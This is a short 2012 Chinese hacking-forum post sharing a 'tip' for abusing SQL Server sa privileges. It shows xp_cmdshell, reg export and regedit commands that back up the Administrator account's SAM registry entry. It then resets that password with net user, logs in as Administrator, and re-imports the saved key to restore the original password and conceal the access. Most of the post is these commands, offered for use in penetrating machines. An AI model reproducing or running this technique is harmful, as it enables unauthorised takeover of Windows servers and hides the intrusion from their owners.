暗组
Would you like to react to this message? Create an account in a few clicks or log in to continue.

**技巧:导出管理员密码文件..........

向下

**技巧:导出管理员密码文件.......... Empty **技巧:导出管理员密码文件..........

帖子  POLARBEAR 周五 八月 03, 2012 7:15 am

sa默认应该可以读sam键。
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
net user administrator test
用administrator登陆.
用完机器后
reg import c:\old.reg
根本不用克隆.
找到对应的sid.
/*这则经验非常不错,前面我做过一次渗透就没想到可以这样来!*/
默认情况下sa继承system权限,对sam键值有完全控制权限。
SQL代码
exec master..xp_cmdshell "reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg"--
或者
exec master..xp_cmdshell "regedit -eC:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4"--
都是可行的。

POLARBEAR

帖子数 : 117
注册日期 : 12-07-25

返回页首 向下

返回页首


 
您在这个论坛的权限:
不能在这个论坛回复主题